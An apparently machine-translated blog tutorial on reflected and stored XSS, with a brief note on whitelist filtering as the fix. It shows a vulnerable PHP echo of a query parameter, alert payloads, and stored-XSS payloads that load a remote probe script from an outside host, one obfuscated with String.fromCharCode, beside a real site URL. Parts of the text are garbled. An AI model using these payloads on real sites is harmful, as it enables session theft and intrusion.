xss.php<?php echo $_get[' x ']?> #提交/xss.php?x=<script>alert (1) </script>
Service-side parsing, Echo will complete the output <script>alert (1) </script> into the response body, and then the browser resolution to execute the trigger pop-up window
Storage (persistent) type XSS
The difference between a stored XSS and a reflective XSS is that the committed XSS code is stored on the server (either the database/memory/file system, etc.) and the next request to the target page is not to commit the XSS code.
The most typical example is the message board XSS, the user submits a message containing the XSS code stored in the database, the target user to view the message board is, those messages will be from the database to check the village out and display, the browser found that there is XSS code, as normal HTML and JS parsing execution, so triggered the XSS attack
Storage XSS attacks are the most covert
#eg: http://www.nfpeople.com/user.php?id=21839
<script src= ' http://b.ioio.pub/xss/probe.js ' ></script><svg onload=s=createelement (' script '); Body.appendchild (s); s.src= ' Http://b.ioio.pub/xss/probe.js><svg onload=eval (String.fromCharCode ( 115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,11 2,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,1 12,117,98,47,120,115,115,47,112,114,111,98,101,46,106,115)) >
Repair
The defense of XSS requires strict filtering of the user's input according to the actual situation. Filtering-based XSS defenses are typically divided into two types: blacklist-based filtering and whitelist-based filtering. The latter's defensive effect is often better, for users outside the white list of input, can be directly ignored. In the process of constructing the whitelist, it is necessary to ensure that the user experience is not affected, as far as possible to eliminate all unnecessary input content.
This article is from the "Creative Pilgrim" blog, so be sure to keep this source http://dearch.blog.51cto.com/10423918/1826827
XSS Vulnerability Analysis